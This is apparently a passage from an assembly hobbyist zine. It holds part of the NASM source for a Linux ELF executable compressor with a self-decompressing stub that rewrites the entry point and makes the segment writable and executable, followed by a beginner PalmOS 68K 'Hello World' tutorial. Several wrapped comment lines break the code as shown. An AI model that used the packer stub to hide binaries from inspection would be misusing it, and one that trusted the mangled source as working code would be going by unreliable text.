xor edx,edx ; seek to begin of file + ECX=0 bytes
; xor eax,eax
; mov al,13h
db 6Ah,19 ; push dword 19
pop eax
int 80h
or eax,eax
jns short OK_seek_to_begin
mov ecx,MSEBF
; xor edx,edx
; mov dl,MSEBFS
db 6Ah,MSEBFS ; push dword MSEBFS
pop edx
;;; call WS
ex03: jmp short wsex04
OK_seek_to_begin:
mov esi,fy1eObuffer
mov edi,f1b
read_f: mov ecx,esi
pop edx ; pop in_file_size from stack
; xor eax,eax
; mov al,3 ; sys_read
db 6Ah,3 ; push dword 3
pop eax
int 80h ; note - return in EAX number of bytes read
(negative
; value if error)
cmp eax,edx
jz short OK_read
oops: mov ecx,MERF
; xor edx,edx
; mov dl,MERFS
db 6Ah,MERFS ; push dword MERFS
pop edx
wsex04: call WS
ex04: jmp long ex05 ;short ex05
OK_read:
add eax,esi
mov dword [konyc_dat],eax
; mov ecx,4Ch ; header size
db 6Ah,4Ch ; push dword 4Ch
pop ecx
sub dword [f0s],ecx
repz movsb
push esi
mov esi,uncompress_routine
mov cl,uncompress_routine_size
repz movsb
pop esi
; all self compressing is below this:
movsb ; first byte, store it, this byte can't be
compressed
call o_C_0 ; setup [position] and byte on [position]
dec dword [f0s]
jz near terminate002
; xor eax,eax
; mov dword [last_delta],eax ; I know : all data in UDATASEG is
zero
; ; but use dirty tricks and must be
sure
; ; dword [last_delta] can be non zero
if
; ; compressed fy1e overwrite
; ; [last_delta] but i hope that
; ; compressed will be smaller as
; ; original executable
call progress
compress002:
call scan002
; some optimalizations for found better chain as chain by scan0002
cmp eax,1
jbe near cant_optimize_002_L0
; on ESI is EAX lenght chain
; explore if on SI isn't chain with no change delta - if it's use this chain
call scanincd ; include procedure in scan_ncd.inc
jc cant_optimize_002_L1
mov ebx,dword [last_delta]
; pack without change delta has superior pack priority ( the best pack ratio
)
jmp near A08_new_optimalization
cant_optimize_002_L1:
xchg dword [last_delta],ebx
push ebx
push eax
push esi
add esi,eax
stc
cmp dword [konyc_dat],esi
jz chumaj
inc esi
cmp dword [konyc_dat],esi
jz chumaj
call scan002
call scanincd
chumaj: pop esi
pop eax
pop ebx
xchg dword [last_delta],ebx
jnc near cant_optimize_002_L0
skus_toto_L0:
push ebx
push eax
inc esi
call scan002
call scanincd
dec esi ; DEC don't change Carry !!!
xchg ecx,eax ; number of bytes to ECX
; XCHG don't change Carry !!!
pop eax ; POP don't change Carry !!!
pop ebx
jc try_next_optimalization
; use chain without change delta require less bits for pack ?
call bitreq_02
push edx ; number of bits for pack non-optimized
chain
xchg ecx,eax ; number of bytes of non-optimized chain ->
CX
; number of bytes of chain without change delta ->
AX
push ebx
mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02
call bitreq_02 ; return EDX = number of bits for pack chain
; without change delta
pop ebx
push edx
push eax
xor eax,eax ; simulate pack 1 byte first ( before chain
; without change delta )
call bitreq_02
pop eax
add dword [esp+0*4],edx
pop edx
xchg ecx,eax ; restore EAX = number of bytes of
; non-optimized chain
inc ecx ; number of bytes for pack optimized chain
cmp eax,ecx
pop ecx ; number of bits for pack non-optimized
chain
jc near pack_1_byte_look_better
cmp edx,ecx
jc near pack_1_byte_look_better
try_next_optimalization:
cmp eax,3
jc try_old_optimalization
push ebx
push eax
inc esi
inc esi
call scan002
call scanincd
dec esi
dec esi
xchg ecx,eax ; number of bytes to ECX
; XCHG don't change Carry !!!
pop eax ; POP don't change Carry !!!
pop ebx
jc try_old_optimalization
; use chain without change delta require less bits for pack ?
call bitreq_02
push edx ; number of bits for pack non-optimized
chain
xchg ecx,eax ; number of bytes of non-optimized chain ->
CX
; number of bytes of chain without change delta ->
AX
push ebx
mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02
call bitreq_02 ; return EDX = number of bits for pack chain
; without change delta
pop ebx
push edx
push eax
xor eax,eax ; simulate pack 1 byte first ( before chain
; without change delta )
call bitreq_02
pop eax
add dword [esp+0*4],edx
pop edx
xchg ecx,eax ; restore EAX = number of bytes of
; non-optimized chain
inc ecx
inc ecx ; number of bytes for pack optimized chain
cmp eax,ecx
pop ecx ; number of bits for pack non-optimized
chain
jc near pack_1_byte_look_better
cmp edx,ecx
jc near pack_1_byte_look_better
try_old_optimalization:
push esi
add esi,eax
cmp dword [konyc_dat],esi
pop esi
jz near L_NO_0
call bitreq_02
push ebx
push eax
push edx
push eax
push esi
add esi,eax
call scan002
call bitreq_02
pop esi
add dword [esp+0*4],eax
add dword [esp+1*4],edx
xor eax,eax
call bitreq_02
push edx
inc esi
call scan002
call bitreq_02
dec esi
add dword [esp+0*4],edx
pop edx ; EDX=bits required by pack 1 byte first
inc eax ; EAX=bytes packed in 2 steps , pack 1 byte
; first
cmp dword [esp+0*4],eax
jc obnov_to
;;; clc
jnz obnov_to
cmp edx,dword [esp+1*4]
obnov_to:
pop eax
pop edx
pop eax
pop ebx
jc near pack_1_byte_look_better
A08_new_optimalization:
cmp eax,3
jc near can_t_use_new_optimalization_08
push esi
add esi,eax
inc esi
inc esi
inc esi ; it's very unhappy idea fucking near the
death
; this isn't usefull for try code marked
; DANGEROUS for last 3 bytes because this
can
; be unstable (data in f0b overleap)
cmp dword [konyc_dat],esi
pop esi
jbe this_is_it
xchg dword [last_delta],ebx
push ebx
push eax
push esi
add esi,eax
inc esi ; DANGEROUS , ESI+1
call scan002
call scanincd ; DANGEROUS , must be ESI + 1 + EAX (where
; EAX > 1)
pop esi ; DEC instruction don't change Carry (=CF)
!!!
pop eax ; POP instruction don't change Carry (=CF)
!!!
pop ebx
xchg dword [last_delta],ebx ; XCHG instruction don't change
Carry
; (=CF) !!!
jnc can_t_use_new_optimalization_08
this_is_it:
push ebx
push eax
push edx ;db 6Ah,0 ; push dword 0 ; bits count=0 but
will
; be overwrited first time because
; chain > 0 bytes will be found
db 6Ah,0 ; push dword 0 ; chain lenght counter
new_optimalization_08_L0:
call scan_lim ; scan EAX chain lenght, return min.
; EBX
call scanincd
jc new_optimalization_08_L1
mov ebx,dword [last_delta]
new_optimalization_08_L1:
call bitreq_02
push edx
push eax
push esi
xchg dword [last_delta],ebx
push ebx
add esi,eax
call scan002
call bitreq_02
pop ebx
xchg dword [last_delta],ebx
pop esi
add eax,dword [esp+0*4]
xchg ecx,eax
pop eax
add dword [esp+0*4],edx
pop edx
cmp dword [esp+0*4],ecx
jc toto_bude_asy_lepseeeee
jnz toto_bude_asy_horse
cmp dword [esp+1*4],edx
jbe toto_bude_asy_horse
toto_bude_asy_lepseeeee:
; mov dword [esp+2*4],ax
; mov dword [esp+3*4],bx
; mov dword [esp+0*4],cx
; mov dword [esp+1*4],dx
add esp, byte 4*4
push ebx
push eax
push edx
push ecx
toto_bude_asy_horse:
dec eax
cmp eax,1
jnz new_optimalization_08_L0
pop eax
pop eax
pop eax
pop ebx
can_t_use_new_optimalization_08:
L_NO_0:
cmp eax,9 ; under 32 bit opcodes it's enough for 1 MB
; data block
; 16 bit delta is less than 64 kB and
require
; max. 4 bytes for calculate it
; Summa: Under DOS its enough use CMP AX,4
; because small value is fast
algorithm
; Under 32 bit OS ( Linux, NT 4.0 )
use
; big value if big data block
; 9 is enough for 4 GB of data block
; Who can produce 4 GB of ASM code
???
jnc cant_optimize_002_L0
; i have chain with AX <2,0Fh> and try pack 1 byte AX times
push eax
db 6Ah,0 ;push 0000h ; bits require counter
push eax ; pack 1 byte AX times
optimize_002_L2:
xor eax,eax
call bitreq_02 ; include procedure in bitreq02.inc
inc esi
add dword [esp+1*4],edx ; bits require counter
dec dword [esp+0*4] ; pack 1 byte EAX times
jnz optimize_002_L2 ; simulate pack 1 byte EAX times
pop eax ; remove word from stack only
pop ecx ; ECX = required bits count for pack 1 byte
EAX
; times
pop eax ; restore EAX
sub esi,eax ; restore ESI
call bitreq_02 ; explore once-pack EAX bytes EBX delta bits
; count
; return EDX=bits required
cmp edx,ecx
jc cant_optimize_002_L0
; use JC for prefer pack 1 byte EAX times
; use JBE for prefer once-pack EAX bytes with delta = EBX
; JC is sometimes better because pack 1 byte don't change delta and it's
; possibility pack without change delta ( call scanincd ) later
; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but
; this depend on data structure and sometimes JBE can be more rational if
; change delta and later pack with this new delta without change delta
; O.K. pack 1 byte now
pack_1_byte_look_better:
xor eax,eax
; now will be packed last 1 byte by call pack002 in a00.asm
; EAX=0
cant_optimize_002_L0:
call pack002
add esi,eax
sub dword [f0s],eax
pushfd
call progress
popfd
jnz near compress002 ; jnz don't handle error if packing
; more bytes as bytes in f0buffer
; jnbe is better
mov ecx,progress_text
xor edx,edx
inc edx
mov byte [ecx],0Ah
call WS
terminate002:
call putbit1
call putbit1
xor eax,eax
stosb
mov ebx,dword [position]
stc
rcl byte [ebx],1
jc done_002
flush: shl byte [ebx],1
jnc flush ; shift all control_bits and remove
; highest ( highest was put in MOV
BYTE
; PTR DS:[DI],1 , INC DI )
done_002:
after_compress:
; modifying data for fill pointer registers in output file
; calculate boundary of moved data
mov ecx,f1b
mov eax,edi
sub eax,f1b - 08048000h + 1
mov dword [ecx+4Fh],eax ; esi value
mov eax,edi
sub eax,f1b+4Ch+fuyi - 08048000h + 1
add eax,dword [ecx+40h]
mov dword [ecx+54h],eax ; edi value
; calculate size of moved data
mov eax,edi
sub eax,f1b+4Ch+fuyi
mov dword [ecx+59h],eax ; ecx value
; calculate offset after uncompress_routine (esi)
mov eax,dword [ecx+40h]
add eax,08048000h + uncompress_routine_end - uncompress_moved
mov dword [ecx+69h],eax ; esi value
; calculate offset of moved U13 (ebp)
sub eax, byte (uncompress_routine_end - U13)
mov dword [ecx+6Eh],eax ; ebp value
; calculate JUMP
mov eax,dword [ecx+18h]
sub eax,dword [ecx+40h]
sub eax,08048000h + uncompress_routine_end - uncompress_moved
mov dword [f1b+0D9h],eax ;[ecx+0D9h],eax
; modify data in a header
mov dword [ecx+18h],0804804Ch ; START
mov eax,edi
; ECX=f1b
sub eax,ecx ; sub eax,f1b
mov dword [ecx+3Ch],eax ; filesize
sub eax, byte ( fuyi + 4Ch + 1 )
add dword [ecx+40h],eax ; memorysize
mov byte [ecx+44h],111b ; Exec,Write,Read
; O.K. going write output...
mov ebx,dword [f1h]
; ECX=f1b
;;; mov ecx,f1b
mov edx,edi
sub edx,ecx
; xor eax,eax
; mov al,4 ; sys_write
db 6Ah,4 ; push dword 4
pop eax
int 80h
cmp eax,edx
jz OK_write
mov ecx,MEWF
; xor edx,edx
; mov dl,MEWFS
db 6Ah,MEWFS ; push dword MEWFS
pop edx
call WS
ex05: jmp short exit
OK_write:
mov esi,f0h
lodsd
xchg ebx,eax
; xor eax,eax
; mov al,6 ; sys_close
db 6Ah,6 ; push dword 6
pop eax
int 80h
lodsd
xchg ebx,eax
; xor eax,eax
; mov al,6 ; sys_close
db 6Ah,6 ; push dword 6
pop eax
int 80h
exit:
xor ebx,ebx
; xor eax,eax
; inc eax
db 6Ah,1
pop eax ; this is better for compress as xor eax,eax inc eax
; sys_exit
int 80h
WS: xor ebx,ebx
inc ebx ; EBX=1 (STDOUT)
; xor eax,eax
; mov al,4 ; write
db 6Ah,4 ; push dword 4
pop eax
int 80h
ret
; -------
scan002:
; input: chain on ESI
; return: EAX max. lenght ( 0 or 1 for chain not found ) , EBX delta
push esi
push edi
xor edx,edx ; chain lenght counter
mov edi,f0b
mov ecx,esi
sub ecx,edi
lodsb
scan_L00:
jecxz scan_L04
repnz scasb
jnz scan_L04
push eax
push ecx
push esi
push edi
mov eax,dword [konyc_dat]
sub eax,esi
mov ecx,eax
jecxz scan_L03
scan_L01:
repz cmpsb
jnz scan_L02
inc eax ; last byte is in chain and must be
encountered
scan_L02:
sub eax,ecx
cmp eax,1 ; chain must be minimal 2 bytes long
jbe scan_L03
cmp eax,edx
jc scan_L03
xchg edx,eax
mov ebx,esi
sub ebx,edi ; EBX=shift=deta
scan_L03:
pop edi
pop esi
pop ecx
pop eax
jmp short scan_L00
scan_L04:
pop edi
pop esi
xchg edx,eax
ret
; -------
scan_ncd:
; input: chain on ESI , EAX requested lenght with shift = [last_delta]
; return: EAX max. lenght ( 0 or 1 for chain not found )
cmp dword [last_delta], byte 0
jnz mozno_aj_bude
xor eax,eax
ret
mozno_aj_bude:
push ecx
push esi
push edi
mov edi,esi
sub edi,dword [last_delta]
mov ecx,eax
repz cmpsb
pop edi
pop esi
jnz scan_ncd_0
inc eax ; last byte is in chain and must be
encountered
scan_ncd_0:
sub eax,ecx
pop ecx
ret
scanincd:
; input: chain on ESI , EAX requested lenght with shift = [last_delta]
; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found
cmp dword [last_delta], byte 0
jnz mozno_aj_bude_0
stc
ret
mozno_aj_bude_0:
push ecx
push esi
push edi
mov edi,esi
sub edi,dword [last_delta]
mov ecx,eax
repz cmpsb
pop edi
pop esi
jnz nebude_any_ket_sa_zesere_z_blbych_pocytov
jecxz zeserau_sa_z_blbych_pocytov
nebude_any_ket_sa_zesere_z_blbych_pocytov:
stc
pop ecx
ret
zeserau_sa_z_blbych_pocytov:
clc
pop ecx
ret
; -------
scan_lim:
; input: chain on ESI , EAX chain lenght , EAX > 1
; return: EBX minimal delta
; this procedure is usefull for call after call scan002 for scan shorter
chains
; on this some ESI
; call scan_lim assume that on ESI is chain with {EAX}
<3,max_register_limit>
; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2
; {EAX} is value returned after call scan002
push ecx
push edi
mov edi,esi
scan_lim_L00:
dec edi
; cmp edi,f0b ; call scan_lim assume that longer chain was
; ; found
; jc scan_lim_L00
mov ecx,eax
push esi
push edi
repz cmpsb
pop edi
pop esi
jnz scan_lim_L00
jecxz scan_lim_L01
jmp short scan_lim_L00
scan_lim_L01:
mov ebx,esi
sub ebx,edi
pop edi
pop ecx
ret
; -------
bitreq_02:
; input : EAX = number of bytes for pack request
; EBX = shift = delta ( if EAX = 2 or more )
; output : EDX = number of bits required for pack
; destroy: nothing
cmp eax,1
jnbe bitreq_more_bytes
bitreq_1_byte:
db 6Ah,7 ; push doubleword 7
pop edx ; make EDX=7
; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used
; byte for compress is = 00h ?
cmp byte [esi],0
jz bitreq_7_bits ; 7 bits required ( sequence 1100000 )
bitreq_jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
push eax
mov al,byte [esi]
push ecx
; xor ecx,ecx
; mov cl,15
db 6Ah,15
pop ecx
push edi
mov edi,esi
sub edi,ecx
cmp edi,f0b
jnc bitreq_pome_skusat
mov edi,f0b
mov ecx,esi
sub ecx,edi
bitreq_pome_skusat:
repnz scasb
pop edi
pop ecx
pop eax
jz bitreq_7_bits
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
mov dl,9
bitreq_7_bits:
mov al,1 ; 1 byte packed EAX=1
ret
bitreq_more_bytes:
cmp ebx,dword [last_delta]
jnz bitreq_another_delta
bitreq_old_delta:
bsr edx,eax ; ( bits / 2 ) for calculate bytes count
lea edx,[2*edx+4] ; 4 bits sequence 1000 don't calculate new
; delta
ret
bitreq_another_delta:
cmp ebx,byte 7Fh ; cmp ebx,7Fh
require 3
; bytes
jnbe bitreq_big_delta_or_more_bytes
cmp eax,4
jnc bitreq_big_delta_or_more_bytes
; pack 2 or 3 bytes with delta <+0001h,+007Fh>
db 6Ah,8+3
pop edx ;mov edx,8+3 ; 8 bit = 1 byte for
; MOV BL,[ESI] INC
ESI
ret ; 3 bit sequence 111 switch to this
; mode
bitreq_big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
push eax
push ebx
cmp ebx,byte 7Fh
jnbe bitreq_high_delta
dec eax
dec eax ; invert for 2x INC ECX in decompress
bitreq_high_delta:
bsr eax,eax ; (bits/2) for calculate count
shr ebx,8 ; remove BL part of delta
inc ebx
inc ebx
inc ebx ; invert for 3x DEC EBX in decompress
bsr ebx,ebx ; (bits/2) for calculate delta without BL
add eax,ebx
lea edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode
; 8 bit=1 byte for MOV BL,[ESI] INC ESI
pop ebx
pop eax
ret
; -------
pack002:
; input : EAX = number of bytes for pack request
; EBX = shift = delta ( if AX = 2 or more )
; output : EAX = number of bytes packed
cmp eax,1
jnbe pack_more_bytes
pack_1_byte:
; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used
; byte for compress is = 00h ?
mov al,byte [esi]
or al,al
jz common_7_bits ; putbit sequence 1100000
jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
xor ecx,ecx
mov cl,15
push edi
mov edi,esi
sub edi,ecx
cmp edi,f0b
jnc pome_skusat
mov edi,f0b
mov ecx,esi
sub ecx,edi
pome_skusat:
repnz scasb
pop edi
jnz jerk_it_off_and_try_again
xchg ecx,eax
inc eax ; EAX = shift (possitive value)
common_7_bits:
call putbit1
call putbit1
call putbit0
mov cl,4
shl al,cl
pbimu7: shl al,1
call putbit
loop pbimu7
jmp short pack_1_byte_common_end
jerk_it_off_and_try_again:
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
movsb
dec esi ; restore ESI to ESI before pack
call putbit0
pack_1_byte_common_end:
xor eax,eax
inc eax ; 1 byte packed EAX=1
ret
pack_more_bytes:
push eax ; store EAX for restore number of bytes
packed
; ( by POP EAX )
cmp ebx,dword [last_delta]
jnz another_delta
pack_with_old_delta:
call putbit1
call putbit0
call putbit0
call putbit0 ; sequence 1000 don't calculate new delta
mov ecx,32
fdcd: dec ecx
shl eax,1
jnc fdcd ; shift bits left and remove highest bit=1
; this bit will be put by INC CX in
decompress
mocd: shl eax,1
call putbit
dec ecx
jz mwocd
call putbit1
jmp short mocd
mwocd: call putbit0
pop eax ; packed EAX bytes from input buffer
ret
another_delta:
mov dword [last_delta],ebx ; all modes change last_delta
; cmp ebx,80h ; cmp ebx,80h require 6 bytes
; jnc big_delta_or_more_bytes
db 83h,0FBh,7Fh ;cmp ebx,7Fh ; cmp bx,7Fh require 3
bytes
jnbe big_delta_or_more_bytes
cmp eax,4
jnc big_delta_or_more_bytes
; pack 2 or 3 bytes with delta <+0001h,+007Fh>
call putbit1
call putbit1 ; bit sequence 111 switch to this
mode
; third bit 1 will be passed at end
of
; packing before POP AX
sub al,3 ; value 2 -> CF=1, value 3 -> CF=0
adc bl,bl
xchg ebx,eax
stosb
call putbit1 ; put last control bit must be after
; STOSB (for mov bl,[esi] , inc esi)
; because when decompress , bits are
; processed first and byte second ->
; when compressing , byte must be
; processed before last bit
pop eax ; value 2 or 3
; -> this mode process 2 or 3
bytes
ret
big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
call putbit1
call putbit0
db 83h,0FBh,7Fh ;cmp ebx,7Fh
jnbe high_delta
dec eax
dec eax ; invert for 2x INC ECX in
decompress
high_delta:
push eax
xchg ebx,eax
push eax ; push only for part in BL moved to AL
shr eax,8 ; this destroy AL
inc eax
inc eax
inc eax ; invert for 3x DEC EBX
mov ecx,32
fgfaad: dec ecx
shl eax,1
jnc fgfaad
wetryw: shl eax,1
call putbit
dec ecx
jz shsdwd
call putbit1
jmp short wetryw
shsdwd: call putbit0
pop ebx ; pop only for BL
pop eax ; pop bytes count
calculate_count:
mov ecx,32
fcdcd: dec ecx
shl eax,1
jnc fcdcd ; shift all bits left and remove highest
bit=1
; this bit will be put by INC ECX in
decompress
mwocdl: shl eax,1
call putbit
dec ecx
jz mwocdt
call putbit1
jmp short mwocdl
mwocdt:
xchg ebx,eax
stosb ; store AL (BL in decompress)
; as well in delta <+0001h,+007Fh> , stored
; byte must be before store last bit because
; when decompress, bit will be processed
; first and byte will be loaded later
call putbit0 ; this bit will be processed in
; decompress for calculate ECX ( JC U05 )
pop eax ; packed EAX bytes from input buffer
ret
; -------
; putbit input : Carry Flag (CF=0,CF=1)
; output : bit 0. in [position], EDI+1 as need for store bit to
[EDI]
; destroy: nothing
putbit0:clc ; put bit=0
jmp short putbit
putbit1:stc ; put bit=1
putbit: push ebx
mov ebx,dword [position]
rcl byte [ebx],1
pop ebx
jnc o_C_1
o_C_0: mov byte [edi],1
mov dword [position],edi
inc edi
o_C_1: ret
; -------
progress:
pushad
mov esi,f0s_2
mov edi,progress_text+1
mov ebp,w1hch
lodsd
push eax
sub eax,dword [esi]
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
inc edi
inc edi
pop eax
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
rol eax,4
call ebp
mov ecx,progress_text
xor edx,edx
mov dl,progress_text_size
call WS
popad
ret
w1hch: push eax
and al,00001111b
cmp al,10
sbb al,69h
das
stosb
pop eax
ret
; -------
uncompress_routine:
pushfd
pushad
mov esi,0
mov edi,0
mov ecx,0
std
repz movsb
cld
xchg esi,edi
inc esi
db 83h,0EFh,fuyi - 1 ; sub edi,fuyi-1
push esi
mov esi,0
mov ebp,0 ; U13
mov dl,80h
ret
fuyi equ $ - uncompress_routine
uncompress_moved:
push eax
U00: movsb
U01: call ebp
jnc U00
xor ebx,ebx
call ebp
inc ecx
jnc U03
call ebp
jc U06
mov bl,10h
U02: call ebp
adc bl,bl
jnc U02
jnz U10
xchg ebx,eax
jmp short U12
U03: inc ebx
U04: call ebp
adc ebx,ebx
call ebp
jc U04
U05: call ebp
adc ecx,ecx
call ebp
jc short U05
dec ebx
dec ebx
jz short U09
dec ebx
shl ebx,8
;;;;;;; clc ; clc isn't needed because EBX < 01000000h before
shift
U06: mov bl,byte [esi]
inc esi
jnc U07
shr bl,1
jz U15
sbb cl,ch ; equ SBB CL,BH because BH=CH=0
U07: ;cmp ebx,00007D00h ; this is not implemented, yet
;jnc zvys_o_dve ; i found this in WINCMD32.EXE v. 4.03
;cmp ebx,00000500h ; packed with ASPACK
;jnc zvys_o_jennu
; isn't rational compress 3 bytes with shift > 7CFFh
; rational is at least 4 bytes
; isn't rational compress 2 bytes with shift > 4FFh
; rational is at least 3 bytes
cmp ebx, byte 7Fh ;db 83h,0FBh,7Fh
jnbe U08
zvys_o_dve:
inc ecx
zvys_o_jennu:
inc ecx
U08: pop eax
db 0A8h ; opcodes A8 5B = TEST AL,5B
U09: pop ebx ; opcode 5B
push ebx
U10: neg ebx
U11: mov al,byte [edi+ebx]
U12: stosb
loop U11
jmp short U01
U13: add dl,dl ; get highest bit from control_byte
jnz U14 ; is it last non-zero bit ? = all 8 bits was
processed ?
lodsb ; load control_byte
xchg edx,eax ; store control_byte to DL
adc dl,dl ; put last bit from last control_byte to bit
0.
; of new control_byte
U14: ret
U15: pop eax
popad
popfd
db 0E9h ; jump
dd 0
uncompress_routine_end:
uncompress_routine_size equ $ - uncompress_routine
; -------
MEOF db 'ERROR OPEN file!',0Ah
MEOFS equ $ - MEOF
MECF db 'ERROR CREAT file!',0Ah
MECFS equ $ - MECF
MSEEF db 'ERROR SEEK to END of file!',0Ah
MSEEFS equ $ - MSEEF
MSEBF db 'ERROR SEEK to BEGIN of file!',0Ah
MSEBFS equ $ - MSEBF
MERF db 'ERROR READ file!',0Ah
MERFS equ $ - MERF
MEWF db 'ERROR WRITE file!',0Ah
MEWFS equ $ - MEWF
usage db 0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO
alg0ry'
db 'thm',0Ah
db 0Ah,'usage: a00 '
db 'filename_for_compress compressed_filename',0Ah,0Ah
db 'ASM coding in LINUX by Feryno',0Ah
db 'Feryno: ASSEMBLER-only and DISASSEMBLER-only
wonderfu'
db 'l'
db 0Ah,0Ah
usagesize equ $ - usage
progress_text db 0Dh,'00000000h/00000000h'
progress_text_size equ $ - progress_text
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
filesize equ $ - $$ ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SECTION .bss
ALIGNB 4
f0h resd 1 ; in_file handle
f1h resd 1 ; out_file handle
f0s_2 resd 1 ; in_file size
f0s resd 1 ; in_file size
position resd 1 ; required by putbit procedures
konyc_dat resd 1
last_delta resd 1
fy1eObuffer resb 4Ch ; header of a file
f0b resb 100000h ; kode & data of a fy1e
f0b_size equ $ - fy1eObuffer
f1b_size equ 200000h
f1b resb f1b_size
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
bsssize equ $ - $$ ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
memsize equ filesize+bsssize ;;
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::........................................PALMOS.ENVIRONMENT
Hello Tiny
World
by Latigo
Hola! This is a tutorial on assembler for the PalmOS enviroment. I decided
to
write them due to the lack of material on the web. To assemble the asm
presented in this paper, you need to get Darrin Massena's ASDK; which can be
downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK
contains an assembler,disassembler, the palm emulator and many other great
tools. Massena is the low-level-semi-god-techno-guru who created the
assembler
(Pila), along with many other tools and documents. He was my starting point
(and for many others too) for asm coding in the Palm enviroment.
The Palm uses a variation of the 68K Motorola CPU called 'DragonBall' which
has
8 32-bit Data registers (from D0 to D7), 8 Addres registers (from A0 to A7)
being A7 the stack pointer,one PC register which is the 'Program Counter'
which
contains the address of the instruction to be executed next and one 16 bits
register called the Status Register (SR). Another thing to be noted is the
way
operands are specified in the DragonBall enviroment. It's not 'DEST,SRC' as
in
the Wintel world we all know, but 'SRC,DEST'. Say if you wanted to copy all
the
contents of the D7 register to the D0 this should be done: 'MOVE.L D7,D0'.
One last very important thing too is how to specify data types. In the
previous
example i used 'MOVE.L' where '.L' is talking about a 'long' data type. I
could
have used '.b' or '.w' meaning byte and word respectively. The size is
always
appended, when suitable, to the instruction nmemonic. So what im gonna show
you
here is something pretty basic, but will be enough as a start. It's the
typicall 'Hello World'.
Theory:
-------
We will create a basic Palm program in assembly which will make use of the
FrmAlert Systrap in order to display an Alert Resource.
Word FrmAlert (
Word alertId
);
As you can see this Systrap (the word Systrap can be taken as a sinonym of
the
word 'API') takes one parameter. An Alert resource. There are many resource
types (String,Form,version,etc) but we only care for the 'Alert' type. All
this
means that we must create a resource file (.rcp) which includes our Alert
and
the Asm file (.asm) which contains the code to display the Alert resource.
All this said, lets do some 'Hello tiny world' :)
The resource file (Hello.rcp):
------------------------------
; Here we are going to declare our resources. In this case only an Alert
; resource is going to be create since that's all we need
ALERT ID 1000
; This is the ID of our Alert.
INFORMATION
; This is the TYPE of the Alert. It could be [INFORMATION]
; or [CONFIRMATION] or [WARNING] or [ERROR]
BEGIN
; Beginning of the Alert resource. Let's define all it's properties.
TITLE "Hello tiny World!"
; This would be the title of the Alert
MESSAGE "This is just the beginning!"
; Yes, you guessed. Its the Message
BUTTONS "Ciao :)"
; In this case we have only one button
END
; END of the Alert resource
The asm file (Hello.asm):
-------------------------
Appl "MBox", 'Lat1'
; This sets the program's name and Id. The name is the one that will show up
in
; the installed program's list. The ID is that,an ID :)
include "Pilot.inc"
; Just like windows.inc, full of constants, structure offsets,API trap
codes,
; etc.
include "Startup.inc"
; Startup.inc contains a standard startup function which must be the first
; within an application and is called by the PalmOS after the app is loaded.
; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our
; app is called and after it returns, SysAppExit is called. In short, don't
; remove this :)
MyAlert equ 1000
; Some Constants
code
proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w)
; Just like WinMain; PilotMain's prototype is in Pilot.inc.
; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD
; (launchFlags)
; Whenever parameters are passed to API calls, their size has to specified
too.
; So '.b' for a byte,'.w' for a word and '.l' for a Long.
; Remember that PilotMain is called from StartUp.inc!!
beginproc
; Marks the beginning of a procedure by reserving the needed space in the
stack
; for local variables if any. To do this it performs the link a6,#nnnn where
; #nnnn is the number of bytes.
TST.W cmd(a6)
; PilotMain function is called many times in different circumstances so here
we
; check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is 0?)
which
; would mean a 'normal' program launching.
; TST.W cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel enviroment .W
implies
; that only 2 bytes out of the cmd variable will be TeSTed cmd(a6) tells
pila
; that the cmd variable is a LOCAL variable. Would it have been cmd(a5),
then
; the assembler would know that cmd is a GLOBAL variable.
BNE PmReturn
; BNE = Branch Not Equal. Just like the beloved JNZ
systrap FrmAlert(#MyAlert.w)
; MessageBox! :) systrap is the keyword to invoke APIs, it PUSHes the
specified
; parameters and cleans the stack after the API execution.
; # means that MyAlert is specifying a CONSTANT NUMBER and .w means that
; MyAlert is making reference to a WORD
;
; systrap FrmAlert(#MyAlert.w) would be the same as:
; move.w #MyAlert,-(a7) = push alert id on stack and decrement it
; trap #15 = PalmOS API call
; dc.w sysTrapFrmAlert = invoke the alert dialog! by declaring the
; word that is equivalent to
'sysTrapFrmAlert'
